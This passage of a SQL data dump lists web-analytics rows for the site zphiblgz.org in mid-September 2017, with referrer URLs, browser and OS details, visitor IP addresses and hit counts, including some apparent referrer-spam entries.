.1','','105.104.127.78','000',2,0),(10964,'2017-09-13','http://zphiblgz.org','Chrome','Windows','60.0.3112.113','','208.76.113.4','000',1,0),(10965,'2017-09-13','http://www.zphiblgz.org','Chrome','Windows','39.0.2171.95','','104.192.74.20','000',31,0),(10966,'2017-09-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','104.192.74.20','000',23,0),(10967,'2017-09-13','http://zphiblgz.org','Firefox','Windows','40.1','','122.8.82.156','000',2,0),(10968,'2017-09-13','http://zphiblgz.org','Firefox','Windows','40.1','','116.73.63.26','000',2,0),(10969,'2017-09-13','http://zphiblgz.org','Safari','iPhone','6.0','','123.126.113.104','000',1,0),(10970,'2017-09-13','https://www.google.com/','Chrome','Windows','60.0.3112.113','','129.2.181.152','000',1,0),(10971,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.70.10.238','000',1,0),(10972,'2017-09-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.70.177','000',1,0),(10973,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.169','000',4,0),(10974,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.216','000',2,0),(10975,'2017-09-13','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','52.33.124.35','000',1,0),(10976,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',1,0),(10977,'2017-09-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','171.25.193.20','000',1,0),(10978,'2017-09-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(10979,'2017-09-13','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(10980,'2017-09-13','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1543.9Q52rHHa5u4isW7XsWcJlPNl9BSWdpJKsw5KJeENCwOMV2WNNciy4ldATAR4MDh8.afc5609f573656fb3d872eea54f37c5bc03fa783&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGv9iZwKiy-E54GYiollMFA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSVVTQjdlcjE3RGJpc0tSalpkaUVpbmZFUVZRWUEwSFV2SU1vdzdFd2ZnNklfQUVDME1LWVhQ&b64e=2&sign=a78d020eeebfc0f65b6ad3386d5355de&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTmtZOZKtt8oqdSxJkzWuaU67RHE7Gy6p0sZC6tVNccLZ83Xg31KcGbIiiIsPFRUnw6xBjBTCIKMWVrg3g-dq9fW-6bN6nqOkSURP3n8sFrhAOtOliqS8wB7EuptSbkyY5&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCV-HtQ36UFK01vxrjgALYu7UFB1UJX6_smKvvHfoiUcrLjnn7Ys9lHlg8lwsUzZH9tpwn3uRa5LCA&l10n=ru&cts=1505329572348&mc=6.36212947323','Firefox','Windows','53.0','','5.228.8.13','000',1,0),(10981,'2017-09-13','http://zphiblgz.org','Firefox','Windows','40.1','','179.228.209.137','000',2,0),(10982,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.85.101','000',1,0),(10983,'2017-09-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.11.167.58','000',1,0),(10984,'2017-09-13','http://zphiblgz.org','Firefox','Windows','29.0','','50.116.5.8','000',4,0),(10985,'2017-09-13','http://zphiblgz.org','Firefox','Windows','40.1','','95.79.214.189','000',2,0),(10986,'2017-09-13','http://zphiblgz.org','Chrome','Windows','61.0.3163.79','','198.51.197.174','000',5,0),(10987,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.76.81','000',2,0),(10988,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.107.85.62','000',2,0),(10989,'2017-09-13','https://vsdshnik.com/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(10990,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',2,0),(10991,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.166','000',2,0),(10992,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.63.229','000',2,0),(10993,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.202','000',2,0),(10994,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.161.119','000',1,0),(10995,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.135.158.101','000',2,0),(10996,'2017-09-13','http://zphiblgz.org','Safari','iPhone','10.0','','69.143.34.19','000',11,0),(10997,'2017-09-13','http://zphiblgz.org','Chrome','Windows','60.0.3112.113','','69.143.34.19','000',4,0),(10998,'2017-09-13','http://zphiblgz.org','Firefox','Windows','40.1','','70.30.227.28','000',2,0),(10999,'2017-09-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','167.114.251.167','000',2,0),(11000,'2017-09-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',1,0),(11001,'2017-09-13','http://zphiblgz.org','Safari','Macintosh','5.0.6','','5.9.17.118','000',1,0),(11002,'2017-09-14','http://life-instyle.com/','Opera','Windows','9.0','','46.118.154.197','000',1,0),(11003,'2017-09-14','http://www.zahvat.ru/','Unknown','Unknown','Unknown','','188.163.72.15','000',1,0),(11004,'2017-09-14','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1544.cuJkFlJ_5E5-CvCHiwSPWtm9_ran2sPniEI63ePBYtXjgKAu2untQW6pQC-ar16d.7e41deea559b611f767db0a7079a1c4fba2e0d6d&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YFUVNhHyyhJgRFg5yeLMIWU&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSVVTQjdlcjE3RGJsM3dqNVVZUDc4UWJDWmRMNlhhSG9CXzFQUWdBTjZfS2pXNUM1WGljN2dK&b64e=2&sign=3272dd7206925dfefb9ce724153c5084&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96Fxe5a_d-PrhUGXykbqRT-QtCnp6939tI9LLdEouMuRYhCiwM9Tbj6IU530y-YPOjDeav6kTZnJkTXSbdB_EWmiic94zJGhx0xP6wlEft-qK5MqqnualLfgzsd35HhweHP&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXdCnh-_wii4SMlE5pEUudUjVnvArOnXeKEKWPZDDDIlXnBJub4Lwh6JmOb9VoYIhsuo1puRf389Q&l10n=ru&cts=1505367436291&mc=5.70007627874','Firefox','Windows','53.0','','128.69.152.12','000',1,0),(11005,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.67.180','000',1,0),(11006,'2017-09-14','http://zphiblgz.org/','Firefox','Windows','7.0.1','','178.17.173.74','000',1,0),(11007,'2017-09-14','zphiblgz.org','Chrome','Windows','5.0.375.99','','85.214.195.142','000',2,0),(11008,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.24.224.100','000',2,0),(11009,'2017-09-14','http://www.zphibmaryland.org/chapters/','Silk','Kindle Fire','60.2.12','','23.112.82.125','000',3,0),(11010,'2017-09-14','http://zphiblgz.org','Firefox','Windows','40.1','','200.74.111.105','000',2,0),(11011,'2017-09-14','http://zphiblgz.org','Firefox','Windows','40.1','','122.178.54.173','000',2,0),(11012,'2017-09-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(11013,'2017-09-14','https://schock-store.ru/','MSIE','Windows','2.0d','','46.118.159.26','000',3,0),(11014,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.82.3','000',1,0),(11015,'2017-09-14','http://zphiblgz.org/','Firefox','Windows','7.0.1','','176.10.104.243','000',1,0),(11016,'2017-09-14','http://copro.pw/','MSIE','Windows','2.0','','46.118.158.19','000',3,0),(11017,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.139.8.104','000',2,0),(11018,'2017-09-14','http://zphiblgz.org','Firefox','Windows','40.1','','49.207.57.205','000',1,0),(11019,'2017-09-14','http://zphiblgz.org','Chrome','Windows','46.0.2490.86','','183.95.88.134','000',2,0),(11020,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','172.98.193.43','000',2,0),(11021,'2017-09-14','http://zphiblgz.org','Firefox','Windows','40.1','','119.94.215.161','000',2,0),(11022,'2017-09-14','zphiblgz.org','Chrome','Windows','50.0.2661.75','','89.36.211.128','000',1,0),(11023,'2017-09-14','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.12','000',1,0),(11024,'2017-09-14','http://zphiblgz.org','Firefox','Windows','40.1','','105.229.87.113','000',2,0),(11025,'2017-09-14','https://23kw.ru/','MSIE','Windows','5.5','','46.118.158.19','000',1,0),(11026,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.40.233','000',2,0),(11027,'2017-09-14','http://zphiblgz.org','MSIE','Windows','11.0','','69.30.222.130','000',5,0),(11028,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.208.153.75','000',3,0),(11029,'2017-09-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','64.137.174.65','000',1,0),(11030,'2017-09-14','http://zphiblgz.org','Chrome','Windows','60.0.3112.113','','208.76.113.4','000',4,0),(11031,'2017-09-14','http://zphiblgz.org','Firefox','Windows','1.0.7','','52.91.53.169','000',1,0),(11032,'2017-09-14','http://zphiblgz.org','Firefox','Windows','40.1','','46.246.185.202','000',2,0),(11033,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','164.132.51.91','000',2,0),(11034,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','31.185.27.208','000',1,0),(11035,'2017-09-14','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.139.161','000',1,0),(11036,'2017-09-14','http://zphiblgz.org','Firefox','Windows','40.1','','122.176.232.102','000',2,0),(11037,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.15.16.4','000',3,0),(11038,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.86','000',2,0),(11039,'2017-09-14','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(11040,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.240','000',2,0),(11041,'2017-09-14','http://zphiblgz.org','Firefox','Windows','40.1','','81.32.235.158','000',2,0),(11042,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.85.22.204','000',1,0),(11043,'2017-09-14','http://zphiblgz.org','Firefox','Windows','48.0','','108.61.196.65','000',2,0),(11044,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.105.116','000',2,0),(11045,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',2,0),(11046,'2017-09-14','http://zphiblgz.org','Firefox','Windows','40.1','','111.235.89.110','000',2,0),(11047,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.78','000',2,0),(11048,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.167.240','000',2,0),(11049,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.169.241','000',2,0),(11050,'2017-09-14','http://zphiblgz.org','Chrome','Windows','60.0.3112.101','','31.41.45.1','000',1,0),(11051,'2017-09-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.53','000',1,0),(11052,'2017-09-14','http://zphiblgz.org','Firefox','Windows','40.1','','70.30.121.137','000',2,0),(11053,'2017-09-14','http://zphiblgz.org','Firefox','Windows','40.1','','41.224.107.19','000',2,0),(11054,'2017-09-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(11055,'2017-09-14','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(11056,'2017-09-14','http://zphiblgz.org','Firefox','Windows','40.1','','155.133.30.21','000',2,0),(11057,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.107.180','000',1,0),(11058,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.134.120','000',2,0),(11059,'2017-09-14','http://sudexpert66.ru/','MSIE','Windows','6.0','','46.118.154.197','000',3,0),(11060,'2017-09-14','https://ikritikimou.gr/','MSIE','Windows','6.0','','188.163.72.15','000',8,0),(11061,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.183.221.231','000',1,0),(11062,'2017-09-14','http://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',2,0),(11063,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.7','000',2,0),(11064,'2017-09-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.62','000',1,0),(11065,'2017-09-14','http://zphiblgz.org','Chrome','Windows','26.0.1410.58','','144.76.71.83','000',1,0),(11066,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.163','000',1,0),(11067,'2017-09-14','http://zphiblgz.org/','Firefox','Windows','7.0.1','','62.210.37.82','000',1,0),(11068,'2017-09-14','http://zphiblgz.org','Firefox','Windows','20.0','','144.76.71.83','000',1,0),(11069,'2017-09-14','http://zphiblgz.org','Safari','Macintosh','5.0.2','','144.76.71.83','000',1,0),(11070,'2017-09-14','http://zphiblgz.org','Safari','Macintosh','5.0.6','','144.76.71.83','000',2,0),(11071,'2017-09-14','http://zphiblgz.org','Chrome','Windows','27.0.1453.90','','144.76.71.83','000',4,0),(11072,'2017-09-14','http://zphiblgz.org','Firefox','Linux','21.0','','144.76.71.83','000',2,0),(11073,'2017-09-14','http://zphiblgz.org','Chrome','Windows','25.0.1364.169','','144.76.71.83','000',1,0),(11074,'2017-09-14','http://zphiblgz.org','Firefox','Windows','18.0','','144.76.71.83','000',2,0),(11075,'2017-09-14','http://zphiblgz.org','Firefox','Windows','14.0.1','','144.76.71.83','000',2,0),(11076,'2017-09-14','http://zphiblgz.org','Safari','Macintosh','6.0.2','','144.76.71.83','000',1,0),(11077,'2017-09-14','http://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','144.76.71.83','000',1,0),(11078,'2017-09-14','http://zphiblgz.org','Chrome','Windows','11.0.696.34','','144.76.71.83','000',1,0),(11079,'2017-09-14','http://zphiblgz.org','Chrome','Windows','26.0.1410.43','','144.76.71.83','000',1,0),(11080,'2017-09-14','http://zphiblgz.org','Chrome','Windows','27.0.1453.94','','144.76.71.83','000',2,0),(11081,'2017-09-14','http://zphiblgz.org','Firefox','Windows','12.0','','144.76.71.83','000',2,0),(11082,'2017-09-14','http://zphiblgz.org','Chrome','Windows','27.0.1453.93','','144.76.71.83','000',2,0),(11083,'2017-09-14','http://zphiblgz.org','Safari','Macintosh','6.0','','144.76.71.83','000',2,0),(11084,'2017-09-14','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.142','000',1,0),(11085,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.142.242.84','000',2,0),(11086,'2017-09-14','http://zphiblgz.org','Edge','Windows','15.15063','','73.213.22.160','000',6,0),(11087,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.64','000',2,0),(11088,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.34.210','000',2,0),(11089,'2017-09-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','109.248.200.50','000',1,0),(11090,'2017-09-14','http://zphiblgz.org','Chrome','Linux','59.0.3071.115','','138.197.96.247','000',1,0),(11091,'2017-09-14','http://zphiblgz.org/','Edge','Windows','15.15063','','5.196.167.229','000',1,0),(11092,'2017-09-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.121','000',1,0),(11093,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','170.250.140.52','000',2,0),(11094,'2017-09-14','https://www.google.com/','Chrome','Android','60.0.3112.116','','99.112.181.42','000',2,0),(11095,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.219.237.229','000',2,0),(11096,'2017-09-14','http://zphiblgz.org/','Chrome','Macintosh','58.0.3029.110','','163.172.4.153','000',1,0),(11097,'2017-09-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','164.132.106.162','000',2,0),(11098,'2017-09-14','https://mmostrike.ru/','MSIE','Windows','7.0b','','46.118.154.197','000',2,0),(11099,'2017-09-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.89.19','000',1,0),(11100,'2017-09-15','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.141.220','000',1,0),(11101,'2017-09-15','http://zphiblgz.org','Firefox','Windows','40.1','','122.53.56.194','000',2,0),(11102,'2017-09-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.62.146','000',2,0),(11103,'2017-09-15','http://zphiblgz.org','MSIE','Windows','11.0','','173.208.211.58','000',1,0),(11104,'2017-09-15','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1545.JIskg9YTCE4PMmlS52n6XZ58hJh8HZ-7GeacRsJGRH26bX-8ZUw5eGNbsQeyD6oy.133d1571942cb1ecd4baaca194826785bd69d463&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMIVJNtoWDTa6Ctl47TPu5I&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSVVTQjdlcjE3RGJ2c1hBQ2xPWGNmVVdXWWNzSHBxQ1J3akk1ZlFBSWE1X09pbWctV2FIN3R2&b64e=2&sign=2895920b2ff9b6ccb01e1f2b368005d4&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarruWco0qqk_t1yUkmNHSw87dGwqkrUGBpj7g2ezbw1e3Dl3I0KIhTPDPQHSlmLCLPrmvCRma0ahc4PsqrXjgbuFir75nnLgYL3PO3CiPl61Wm53xUNnV5SbsqP544JarH3&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVwjJVQHb9CsxDastZtmqzy8Nrweos9CEQj54a1zxjhz2qDEeOWWzQOKQyrEQm3aRP8Q9COoprmqA&l10n=ru&cts=1505463723160&mc=4.9884104334','Firefox','Windows','53.0','','128.69.224.57','000',1,0),(11105,'2017-09-15','http://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.64','000',1,0),(11106,'2017-09-15','http://zphiblgz.org','Firefox','Windows','40.1','','177.41.185.33','000',2,0),(11107,'2017-09-15','http://zphiblgz.org','Firefox','Windows','40.1','','197.43.152.108','000',2,0),(11108,'2017-09-15','http://zphiblgz.org','Firefox','Windows','40.1','','165.16.174.219','000',2,0),(11109,'2017-09-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.254.79.66','000',2,0),(11110,'2017-09-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.1.129','000',2,0),(11111,'2017-09-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.85.22.204','000',2,0),(11112,'2017-09-15','https://proprostatit.com/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(11113,'2017-09-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',2,0),(11114,'2017-09-15','http://ivanovo.zrus.org/','MSIE','Windows','6.0','','46.118.158.19','000',4,0),(11115,'2017-09-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.56.223.241','000',2,0),(11116,'2017-09-15','http://www.zphibmaryland.org/chapters/','Chrome','Windows','60.0.3112.113','','69.195.247.116','000',6,0),(11117,'2017-09-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.134.12','000',2,0),(11118,'2017-09-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.82.67.166','000',2,0),(11119,'2017-09-15','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(11120,'2017-09-15','http://zphiblgz.org','MSIE','Windows','11.0','','37.147.54.201','000',1,0),(11121,'2017-09-15','http://zphiblgz.org','Firefox','Windows','40.1','','86.235.148.71','000',2,0),(11122,'2017-09-15','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.7.103','000',4,0),(11123,'2017-09-15','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiQ7aPP4KfWAhUoj1QKHaVeAWkQFggmMAA&url=http%3A%2F%2Fzphiblgz.org%2Fts_teams%2Fdawn-j-kemp%2F&usg=AFQjCNHlVQvqgX2ntZuZPp8WULWs47yiKg','MSIE','Windows','11.0','','137.200.32.22','000',3,0),(11124,'2017-09-15','http://zphiblgz.org','MSIE','Windows','11.0','','137.200.32.54','000',5,0),(11125,'2017-09-15','http://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',1,0),(11126,'2017-09-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',2,0),(11127,'2017-09-15','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',3,0),(11128,'2017-09-15','http://zphiblgz.org','Chrome','Chrome OS','60.0.3112.112','','69.143.34.19','000',5,0),(11129,'2017-09-15','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','91.121.83.160','000',4,0),(11130,'2017-09-15','http://zphiblgz.org/wp-admin/admin.php?page=hopeful&tab=theme_update','Chrome','Windows','61.0.3163.79','','198.51.197.174','000',230,0),(11131,'2017-09-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','77.75.77.200','000',2,0),(11132,'2017-09-15','http://www.zahvat.ru/','Opera','Windows','9.0','','188.163.72.15','000',3,0),(11133,'2017-09-15','http://zphiblgz.org','Firefox','Windows','40.1','','139.5.47.81','000',2,0),(11134,'2017-09-15','http://life-instyle.com/','MSIE','Windows','5.5','','46.118.154.197','000',3,0),(11135,'2017-09-15','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','64.137.226.18','000',14,0),(11136,'2017-09-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','64.137.226.18','000',1,0),(11137,'2017-09-15','http://zphiblgz.org','MSIE','Windows','11.0','','63.141.234.10','000',1,0),(11138,'2017-09-15','http://zphiblgz.org','Firefox','Windows','40.1','','74.77.41.249','000',2,0),(11139,'2017-09-15','https://www.google.com/','Chrome','iPhone','61.0.3163.73','','100.15.160.57','000',8,0),(11140,'2017-09-15','http://komputers-best.ru/','Unknown','Unknown','Unknown','','46.118.159.26','000',3,0),(11141,'2017-09-15','https://via-energy-acquistare.com/','MSIE','Windows','6.0','','46.118.159.26','000',2,0),(11142,'2017-09-15','https://www.bing.com/','Edge','Windows','15.15063','','174.107.174.186','000',1,0),(11143,'2017-09-15','http://zphiblgz.org','Firefox','Windows','40.1','','49.151.195.40','000',2,0),(11144,'2017-09-16','http://zphiblgz.org/wp-admin/admin.php?page=hopeful&tab=theme_update','Chrome','Windows','61.0.3163.79','','198.51.197.174','000',715,0),(11145,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','174.50.1.127','000',2,0),(11146,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','177.132.77.200','000',2,0),(11147,'2017-09-16','https://univerfiles.com/','Opera','Windows','8.00','','46.118.158.19','000',2,0),(11148,'2017-09-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.162.106','000',4,0),(11149,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','117.223.184.245','000',2,0),(11150,'2017-09-16','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.108.186','000',2,0),(11151,'2017-09-16','http://zphiblgz.org','Chrome','Windows','55.0.2883.75','','27.152.0.75','000',1,0),(11152,'2017-09-16','https://timhost.ru/','MSIE','Windows','5.0','','46.118.158.19','000',2,0),(11153,'2017-09-16','http://zphiblgz.org','Chrome','Windows','60.0.3112.101','','94.74.81.165','000',1,0),(11154,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','58.100.14.166','000',2,0),(11155,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','79.47.203.207','000',2,0),(11156,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','60.49.34.199','000',2,0),(11157,'2017-09-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.138.11','000',2,0),(11158,'2017-09-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.76','000',2,0),(11159,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','126.78.26.25','000',2,0),(11160,'2017-09-16','http://taraz.xkaz.org/','Opera','Windows','7.54','','46.118.159.26','000',3,0),(11161,'2017-09-16','https://moetomnenie.com/','MSIE','Unknown','6.0','','188.163.72.15','000',1,0),(11162,'2017-09-16','http://zphiblgz.org','curl','Unknown','7.38.0','','195.22.126.98','000',1,0),(11163,'2017-09-16','http://zphiblgz.org','Unknown','Unknown','Unknown','','172.3.160.122','000',2,0),(11164,'2017-09-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.205','000',1,0),(11165,'2017-09-16','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.107.81.233','000',1,0),(11166,'2017-09-16','https://moje-recenze.cz/','MSIE','Windows','6.0','','188.163.72.15','000',3,0),(11167,'2017-09-16','http://www.osnova3.ru/','Opera','Windows','9.00','','46.118.154.197','000',3,0),(11168,'2017-09-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',2,0),(11169,'2017-09-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.68','000',2,0),(11170,'2017-09-16','zphiblgz.org','Chrome','Windows','50.0.2661.75','','91.121.106.53','000',1,0),(11171,'2017-09-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.50.200.129','000',2,0),(11172,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','138.130.161.104','000',2,0),(11173,'2017-09-16','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(11174,'2017-09-16','https://www.google.com/','Chrome','Android','60.0.3112.116','','166.216.165.109','000',2,0),(11175,'2017-09-16','http://zphiblgz.org','Chrome','Linux','60.0.3112.116','','166.216.165.109','000',2,0),(11176,'2017-09-16','https://www.google.com/','Chrome','Macintosh','61.0.3163.91','','192.12.13.14','000',2,0),(11177,'2017-09-16','http://zphiblgz.org','Chrome','Android','60.0.3112.116','','172.58.184.121','000',1,0),(11178,'2017-09-16','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.26.211','000',11,0),(11179,'2017-09-16','https://www.google.com/','Safari','iPad','10.0','','192.12.13.14','000',1,0),(11180,'2017-09-16','http://zphiblgz.org','Edge','Windows','15.15063','','166.137.244.110','000',8,0),(11181,'2017-09-16','http://zphiblgz.org','Wget','Linux','1.12','','123.126.113.250','000',1,0),(11182,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','154.47.139.166','000',2,0),(11183,'2017-09-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','204.11.50.131','000',2,0),(11184,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','103.238.107.142','000',2,0),(11185,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','201.131.166.243','000',2,0),(11186,'2017-09-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.62.57.91','000',2,0),(11187,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','14.203.129.31','000',2,0),(11188,'2017-09-16','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.22.214','000',1,0),(11189,'2017-09-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(11190,'2017-09-16','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',3,0),(11191,'2017-09-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.171.163','000',2,0),(11192,'2017-09-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.201','000',2,0),(11193,'2017-09-16','https://kichenaid.ru/','MSIE','Unknown','6.0','','46.118.159.26','000',2,0),(11194,'2017-09-16','http://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','96.244.83.10','000',1,0),(11195,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','83.37.220.122','000',2,0),(11196,'2017-09-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.141.220','000',1,0),(11197,'2017-09-16','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.82.216.241','000',1,0),(11198,'2017-09-16','zphiblgz.org','Chrome','Windows','50.0.2661.75','','89.36.211.128','000',13,0),(11199,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','109.102.218.174','000',2,0),(11200,'2017-09-16','http://zphiblgz.org','MSIE','Windows','6.0','','46.161.9.59','000',25,0),(11201,'2017-09-16','http://xdoza.com/','MSIE','Windows','6.0','','46.118.154.197','000',2,0),(11202,'2017-09-16','https://frbizlist.com/','Opera','Windows','8.00','','46.118.154.197','000',3,0),(11203,'2017-09-16','http://www.alt-servis.ru/','Opera','Windows','9.0','